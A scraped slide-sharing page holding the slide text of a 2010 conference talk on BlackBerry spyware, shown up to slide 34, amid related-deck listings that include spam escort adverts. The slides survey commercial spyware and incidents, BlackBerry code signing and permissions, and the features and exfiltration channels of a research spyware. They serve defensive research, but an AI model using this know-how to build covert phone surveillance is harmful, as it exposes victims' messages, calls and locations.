Enviar búsqueda
Cargar
Shmoocon 2010 - The Monkey Steals the Berries
•
0 recomendaciones
•
1,446 vistas
Tyler Shields
Seguir
Tecnología
Empresariales
Denunciar
Compartir
Denunciar
Compartir
1 de 51
Recomendados
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
Tyler Shields
Les 10 risques liés aux applications mobiles
Les 10 risques liés aux applications mobiles
Bee_Ware
Securing hand held computing devices
Securing hand held computing devices
jraja01
BETTER- Threat Whitepaper- PoS
BETTER- Threat Whitepaper- PoS
Purna Bhat
(Pdf) yury chemerkin hacktivity_2013
(Pdf) yury chemerkin hacktivity_2013
STO STRATEGY
ANDROID SECURITY
ANDROID SECURITY
yogeshraut090
Evolutionand impactofhiddenmobilethreats wandera
Evolutionand impactofhiddenmobilethreats wandera
Anjoum .
Top 6-Security-Threats-on-iOS
Top 6-Security-Threats-on-iOS
Innovation Network Technologies: InNet
Recomendados
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
Tyler Shields
Les 10 risques liés aux applications mobiles
Les 10 risques liés aux applications mobiles
Bee_Ware
Securing hand held computing devices
Securing hand held computing devices
jraja01
BETTER- Threat Whitepaper- PoS
BETTER- Threat Whitepaper- PoS
Purna Bhat
(Pdf) yury chemerkin hacktivity_2013
(Pdf) yury chemerkin hacktivity_2013
STO STRATEGY
ANDROID SECURITY
ANDROID SECURITY
yogeshraut090
Evolutionand impactofhiddenmobilethreats wandera
Evolutionand impactofhiddenmobilethreats wandera
Anjoum .
Top 6-Security-Threats-on-iOS
Top 6-Security-Threats-on-iOS
Innovation Network Technologies: InNet
Security News bytes October 2013
Security News bytes October 2013
n|u - The Open Security Community
Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacks
Rohan Fernandes
SmartCard Forum 2011 - Evolution of authentication market
SmartCard Forum 2011 - Evolution of authentication market
OKsystem
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
Tyler Shields
10940 img sytr12_mobile_malware
10940 img sytr12_mobile_malware
SytelReplyUK
(Pdf) yury chemerkin _ath_con_2013
(Pdf) yury chemerkin _ath_con_2013
STO STRATEGY
afam_portfolio
afam_portfolio
Okonkwo Afam
(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013
STO STRATEGY
Make Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile Security
Michael Davis
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Subho Halder
Securing Mobile Apps - Appfest Version
Securing Mobile Apps - Appfest Version
Subho Halder
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CloudIDSummit
TheGRID - Stop Identity Theft
TheGRID - Stop Identity Theft
e-Lock Corporation
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CloudIDSummit
Mobile Application Security
Mobile Application Security
cclark_isec
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
iosrjce
Authshield integration with mails
Authshield integration with mails
AuthShield Labs
Botnet
Botnet
lokenra
Enterprise Mobile Security
Enterprise Mobile Security
HP Enterprise Security
Eating in the school cafeteria
Eating in the school cafeteria
sanjuktasharma
School Cafeteria Point-of-Sale
School Cafeteria Point-of-Sale
ScholarChip ☁ Tools for Smarter Schools
School cafeteria 4
School cafeteria 4
parksandtrees
Más contenido relacionado
La actualidad más candente
Security News bytes October 2013
Security News bytes October 2013
n|u - The Open Security Community
Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacks
Rohan Fernandes
SmartCard Forum 2011 - Evolution of authentication market
SmartCard Forum 2011 - Evolution of authentication market
OKsystem
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
Tyler Shields
10940 img sytr12_mobile_malware
10940 img sytr12_mobile_malware
SytelReplyUK
(Pdf) yury chemerkin _ath_con_2013
(Pdf) yury chemerkin _ath_con_2013
STO STRATEGY
afam_portfolio
afam_portfolio
Okonkwo Afam
(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013
STO STRATEGY
Make Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile Security
Michael Davis
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Subho Halder
Securing Mobile Apps - Appfest Version
Securing Mobile Apps - Appfest Version
Subho Halder
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CloudIDSummit
TheGRID - Stop Identity Theft
TheGRID - Stop Identity Theft
e-Lock Corporation
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CloudIDSummit
Mobile Application Security
Mobile Application Security
cclark_isec
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
iosrjce
Authshield integration with mails
Authshield integration with mails
AuthShield Labs
Botnet
Botnet
lokenra
Enterprise Mobile Security
Enterprise Mobile Security
HP Enterprise Security
La actualidad más candente
(19)
Security News bytes October 2013
Security News bytes October 2013
Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacks
SmartCard Forum 2011 - Evolution of authentication market
SmartCard Forum 2011 - Evolution of authentication market
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
10940 img sytr12_mobile_malware
10940 img sytr12_mobile_malware
(Pdf) yury chemerkin _ath_con_2013
(Pdf) yury chemerkin _ath_con_2013
afam_portfolio
afam_portfolio
(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013
Make Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile Security
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Securing Mobile Apps - Appfest Version
Securing Mobile Apps - Appfest Version
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
TheGRID - Stop Identity Theft
TheGRID - Stop Identity Theft
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
Mobile Application Security
Mobile Application Security
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
Authshield integration with mails
Authshield integration with mails
Botnet
Botnet
Enterprise Mobile Security
Enterprise Mobile Security
Destacado
Eating in the school cafeteria
Eating in the school cafeteria
sanjuktasharma
School Cafeteria Point-of-Sale
School Cafeteria Point-of-Sale
ScholarChip ☁ Tools for Smarter Schools
School cafeteria 4
School cafeteria 4
parksandtrees
PR Plan for School Cafeteria (Yonsei Univ. Korea)
PR Plan for School Cafeteria (Yonsei Univ. Korea)
thenightinseoul
PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012
PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012
Shubham Parsekar
Canteen management system
Canteen management system
RITESH HELONDE
Canteen management system of “himalayan academy” sapana
Canteen management system of “himalayan academy” sapana
Nawaraj Ghimire
Canteen management
Canteen management
Omkar Majukar
Canteen project
Canteen project
jmilne7
a study of the facilities given by the canteens and its efect on student sati...
a study of the facilities given by the canteens and its efect on student sati...
Ritesh Gholap (Digital Ritesh)
Canteen Management System
Canteen Management System
lissapenas123
Canteen management system
Canteen management system
Shailendra Goyal
Destacado
(12)
Eating in the school cafeteria
Eating in the school cafeteria
School Cafeteria Point-of-Sale
School Cafeteria Point-of-Sale
School cafeteria 4
School cafeteria 4
PR Plan for School Cafeteria (Yonsei Univ. Korea)
PR Plan for School Cafeteria (Yonsei Univ. Korea)
PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012
PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012
Canteen management system
Canteen management system
Canteen management system of “himalayan academy” sapana
Canteen management system of “himalayan academy” sapana
Canteen management
Canteen management
Canteen project
Canteen project
a study of the facilities given by the canteens and its efect on student sati...
a study of the facilities given by the canteens and its efect on student sati...
Canteen Management System
Canteen Management System
Canteen management system
Canteen management system
Similar a Shmoocon 2010 - The Monkey Steals the Berries
ISACA CACS 2012 - Mobile Device Security and Privacy
ISACA CACS 2012 - Mobile Device Security and Privacy
Michael Davis
The Consumerisation of Corporate IT
The Consumerisation of Corporate IT
Peter Wood
2010: Mobile Security - WHYMCA Developer Conference
2010: Mobile Security - WHYMCA Developer Conference
Fabio Pietrosanti
Mobile security - Intense overview
Mobile security - Intense overview
PrivateWave Italia SpA
Cn35499502
Cn35499502
IJERA Editor
Securing Mobile Banking Apps - You Are Only as Strong as Your Weakest Link
Securing Mobile Banking Apps - You Are Only as Strong as Your Weakest Link
IBM Security
Can You Steal From Me Now? Mobile and BYOD Security Risks
Can You Steal From Me Now? Mobile and BYOD Security Risks
Michael Davis
Building a Mobile App Pen Testing Blueprint
Building a Mobile App Pen Testing Blueprint
NowSecure
Sholove cyren web security - technical datasheet2
Sholove cyren web security - technical datasheet2
SHOLOVE INTERNATIONAL LLC
Mobile Malware
Mobile Malware
Martin Holovský
Mobile phone as Trusted identity assistant
Mobile phone as Trusted identity assistant
Vladimir Jirasek
Mobile Security 101
Mobile Security 101
Lookout
West Chester Tech Blog - Training Class - Session 10
West Chester Tech Blog - Training Class - Session 10
William Mann
Code protection
Code protection
whitecryption
Tips of Mobile Application Security
Tips of Mobile Application Security
Marie Weaver
Chapter 3_Cyber Security-ccdf.pptx
Chapter 3_Cyber Security-ccdf.pptx
1SI19IS064TEJASS
Protect Your Organization with Multi-Layered Approach to Anti-Phishing
Protect Your Organization with Multi-Layered Approach to Anti-Phishing
Ivanti
Unicom Conference - Mobile Application Security
Unicom Conference - Mobile Application Security
Subho Halder
Mobile Payments: Protecting Apps and Data from Emerging Risks
Mobile Payments: Protecting Apps and Data from Emerging Risks
IBM Security
Trojan horseofbyod2
Trojan horseofbyod2
Stephanie Vanroelen
Similar a Shmoocon 2010 - The Monkey Steals the Berries
(20)
ISACA CACS 2012 - Mobile Device Security and Privacy
ISACA CACS 2012 - Mobile Device Security and Privacy
The Consumerisation of Corporate IT
The Consumerisation of Corporate IT
2010: Mobile Security - WHYMCA Developer Conference
2010: Mobile Security - WHYMCA Developer Conference
Mobile security - Intense overview
Mobile security - Intense overview
Cn35499502
Cn35499502
Securing Mobile Banking Apps - You Are Only as Strong as Your Weakest Link
Securing Mobile Banking Apps - You Are Only as Strong as Your Weakest Link
Can You Steal From Me Now? Mobile and BYOD Security Risks
Can You Steal From Me Now? Mobile and BYOD Security Risks
Building a Mobile App Pen Testing Blueprint
Building a Mobile App Pen Testing Blueprint
Sholove cyren web security - technical datasheet2
Sholove cyren web security - technical datasheet2
Mobile Malware
Mobile Malware
Mobile phone as Trusted identity assistant
Mobile phone as Trusted identity assistant
Mobile Security 101
Mobile Security 101
West Chester Tech Blog - Training Class - Session 10
West Chester Tech Blog - Training Class - Session 10
Code protection
Code protection
Tips of Mobile Application Security
Tips of Mobile Application Security
Chapter 3_Cyber Security-ccdf.pptx
Chapter 3_Cyber Security-ccdf.pptx
Protect Your Organization with Multi-Layered Approach to Anti-Phishing
Protect Your Organization with Multi-Layered Approach to Anti-Phishing
Unicom Conference - Mobile Application Security
Unicom Conference - Mobile Application Security
Mobile Payments: Protecting Apps and Data from Emerging Risks
Mobile Payments: Protecting Apps and Data from Emerging Risks
Trojan horseofbyod2
Trojan horseofbyod2
Más de Tyler Shields
The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
Tyler Shields
Defending Behind the Mobile Device
Defending Behind the Mobile Device
Tyler Shields
Avoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
Tyler Shields
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
Tyler Shields
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Tyler Shields
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
Tyler Shields
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Tyler Shields
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Tyler Shields
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Tyler Shields
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the Berries
Tyler Shields
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the Berries
Tyler Shields
Static Detection of Application Backdoors
Static Detection of Application Backdoors
Tyler Shields
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Tyler Shields
Anti-Debugging - A Developers View
Anti-Debugging - A Developers View
Tyler Shields
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
Tyler Shields
More Apps More Problems
More Apps More Problems
Tyler Shields
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
Tyler Shields
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
Tyler Shields
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
Tyler Shields
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
Tyler Shields
Más de Tyler Shields
(20)
The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
Defending Behind the Mobile Device
Defending Behind the Mobile Device
Avoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the Berries
Static Detection of Application Backdoors
Static Detection of Application Backdoors
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Anti-Debugging - A Developers View
Anti-Debugging - A Developers View
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
More Apps More Problems
More Apps More Problems
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
Último
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Rafal Los
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
The Digital Insurer
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
Radu Cotescu
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
hans926745
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
debabhi2
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
Slack Application Development 101 Slides
Slack Application Development 101 Slides
praypatel2
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Neo4j
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
Antenna Manufacturer Coco
Último
(20)
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Slack Application Development 101 Slides
Slack Application Development 101 Slides
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
Shmoocon 2010 - The Monkey Steals the Berries
1.
Blackberry Mobile Spyware The
Monkey Steals the Berries Tyler Shields February 5, 2010
2.
Outline Introduction Case
Studies of Mobile Spyware Blackberry Security Mechanisms Installation Methods Effects and Behaviors Technical Specifications Methods of Detection and Future Work Demonstration © 2010 Veracode, Inc. 2
3.
Presenter Background Currently
Sr. Security Researcher, Veracode, Inc. Previously Security Consultant - Symantec Security Consultant - @Stake Incident Response and Forensics Handler – US Government Wishes He Was Infinitely Rich Personal Trainer to hot Hollywood starlets © 2010 Veracode, Inc. 3
4.
Mobile Spyware Often
includes modifications to legitimate programs designed to compromise the device or device data Often inserted by those who have legitimate access to source code or distribution binaries May be intentional or inadvertent Not specific to any particular programming language Not specific to any particular mobile Operating System © 2010 Veracode, Inc. 4
5.
Attacker Motivation Practical
method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so may bypass mobile AV Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection For high value targets such as financial services and government it becomes cost effective and more reliable – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation – Think “Aurora” for Mobile Devices © 2010 Veracode, Inc. 5
6.
Back To The
Future © 2010 Veracode, Inc. 6
7.
Back To The
Future © 2010 Veracode, Inc. 7
8.
Case Studies of
Mobile Spyware © 2010 Veracode, Inc. 8
9.
FlexiSpy http://www.flexispy.com $149
- $350 PER YEAR depending on features Features – Remote Listening – C&C Over SMS – SMS and Email Logging – Call History Logging – Location Tracking – Call Interception – GPS Tracking – Symbian, Blackberry, Windows Mobile Supported © 2010 Veracode, Inc. 9
10.
FlexiSpy Web Site
Quotes “Download FlexiSPY spyphone software directly onto a mobile phone and receive copies of SMS, Call Logs, Emails, Locations and listen to conversations within minutes of purchase. “ “Catch cheating wives or cheating husbands, stop employee espionage, protect children, make automatic backups, bug meetings rooms etc.” “F Secure seem to think that its ok for them to interfere with legitimate, legal and accountable software. Who appointed them judge, jury and executioner anyway, and why wont they answer our emails, so we have to ask who is the real malware? Here is how to remove FSecure malware from your device. Please don't believe the fsecure fear mongers who simply wish you to buy their products.” © 2010 Veracode, Inc. 10
11.
Mobile Spy http://www.mobile-spy.com
$49.97 PER QUARTER or $99.97 PER YEAR Features – SMS Logging – Call Logging – GPS Logging – Web URL Logging – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian © 2010 Veracode, Inc. 11
12.
Mobile Spy Web
Site Quotes “This high-tech spy software will allow you to see exactly what they do while you are away. Are your kids texting while driving or using the phone in all hours of the night? Are your employees sending company secrets? Do they erase their phone logs?” “Our software is not for use on a phone you do not own or have proper permission to monitor from the user or owner. You must always follow all applicable laws and regulations in your region.” “Purchased by more than 30,000 customers in over 150 countries” © 2010 Veracode, Inc. 12
13.
Etisalat (SS8) Cell
carrier in United Arab Emirates (UAE) Pushed via SMS as “software patch” for Blackberry smartphones Upgrade urged to “enhance performance” of Blackberry service Blackberry PIN messaging as C&C Sets FLAG_HIDDEN bit to true Interception of outbound email / SMS only Discovered due to flooded listener server cause retries that drained batteries of affected devices Accidentally released the .jar as well as the .cod (ooopsie?!) © 2010 Veracode, Inc. 13
14.
Bugs & Phonesnoop
Bugs – Exfiltration of inbound and outbound email – Hidden PhoneSnoop – Remotely turn on a Blackberry phone microphone – Listen in on target ambient conversation © 2010 Veracode, Inc. 14
15.
Storm8 Phone Number
Farming – iMobsters and Vampires Live (and others) – “Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhone user who downloads any Storm8 game," the suit alleges. " ... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed." – “Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue.” – These were available via the iTunes App Store! – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html © 2010 Veracode, Inc. 15
16.
Symbian Sexy Space
– Poses as legitimate server ACSServer.exe – Calls itself 'Sexy Space„ – Steals phone and network information – Exfiltrates data via hacker owned web site connection – Can SPAM contact list members – Basically a “botnet” for mobile phones – Signing process Anti-virus scan using F-Secure - Approx 43% proactive detection rate (PCWorld) Random selection of inbound manually assessed – Symbian signed this binary as safe! – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm © 2010 Veracode, Inc. 16
17.
09Droid – Banking
Applications Attack – Droid app that masquerades as any number of different target banking applications – Target banks included Royal Bank of Canada Chase BB&T SunTrust Over 50 total financial institutions were affected – May steal and exfiltrate banking credentials – Approved and downloaded from Google’s Android Marketplace! – http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps- market – http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953 – http://www.f-secure.com/weblog/archives/00001852.html © 2010 Veracode, Inc. 17
18.
Blackberry Security Mechanisms ©
2010 Veracode, Inc. 18
19.
Blackberry Takes Security
Seriously KB05499: Protecting the BlackBerry smartphone and BlackBerry Enterprise Server against malware http://www.blackberry.com/btsc/search.do?cmd=displayKC&docTyp e=kc&externalId=KB05499 Protecting the BlackBerry device platform against malware http://docs.blackberry.com/en/admin/deliverables/1835/Protecting the BlackBerry device platform against malware.pdf Placing the BlackBerry Enterprise Solution in a segmented network http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_ BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf BlackBerry Enterprise Server Policy Reference Guide http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Refer ence_Guide.pdf © 2010 Veracode, Inc. 19
20.
Does It Really
Matter?! Only 23% of smartphone owners use the security software installed on the devices. (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 13% of organizations currently protect from mobile viruses (Mobile Security 2009 Survey by Goode Intelligence) © 2010 Veracode, Inc. 20
21.
Code Signing Subset
of Blackberry API considered “controlled” Use of controlled package, class, or method requires appropriate code signature Blackberry Signature Tool comes with the Blackberry JDE Acquire signing keys by filling out a web form and paying $20 – This not is a high barrier to entry – 48 hours later you receive signing keys Install keys into signature tool © 2010 Veracode, Inc. 21
22.
Code Signing Process
Hash of code sent to RIM for API tracking purposes only RIM does not get source code COD file is signed based on required keys Application ready to be deployed Easy to acquire anonymous keys © 2010 Veracode, Inc. 22
23.
IT Policies Requires
connection to Blackberry Enterprise Server (BES) Supersedes lower levels of security restrictions Prevent devices from downloading third-party applications over wireless Prevent installation of specific third-party applications Control permissions of third party applications – Allow Internal Connections – Allow Third-Party Apps to Use Serial Port – Allow External Connections MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 23
24.
Application Policies Can
be controlled at the BES If no BES present, controls are set on the handheld itself Can only be MORE restrictive than the IT policy, never less Control individual resource access per application Control individual connection access per application MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 24
25.
V4.7.0.148 Default 3rd
Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Browser Filtering Recording Reset Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 25
26.
V5.0.0.328 Default 3rd
Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 26
27.
V5.0.0.328 Trusted 3rd
Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 27
28.
Installation Methods © 2010
Veracode, Inc. 28
29.
Installation Methods Accessing
a web site using the BlackBerry Browser and choosing to download the application over the network (OTA Installation) Running the application loader tool of the BlackBerry Desktop Manager and choosing to download the application onto the BlackBerry device using a physical connection to the computer Blackberry BES push the application to your user community Get it into the Blackberry App World and let the user choose to install it for you! © 2010 Veracode, Inc. 29
30.
Installation Files .COD
files: A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code. .JAD files: An application descriptor that stores information about the application itself and the location of .COD files .JAR files: a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata. .ALX files: Similar to the .JAD file, in that it holds information about where the installation files for the application are located © 2010 Veracode, Inc. 30
31.
txsBBSpy Effects and
Behaviors © 2010 Veracode, Inc. 31
32.
txsBBSpy Logging and
Dumping Monitor connected / disconnected calls Monitor PIM added / removed / updated Monitor inbound SMS Monitor outbound SMS Real Time track GPS coordinates Dump all contacts Dump current location Dump phone logs Dump email Dump microphone capture (security prompted) © 2010 Veracode, Inc. 32
33.
txsBBSpy Exfiltration and
C&C Methods SMS (No CDMA) SMS Datagrams (Supports CDMA) Email HTTP GET HTTP POST TCP Socket UDP Socket Command and control hard coded to inbound SMS © 2010 Veracode, Inc. 33
34.
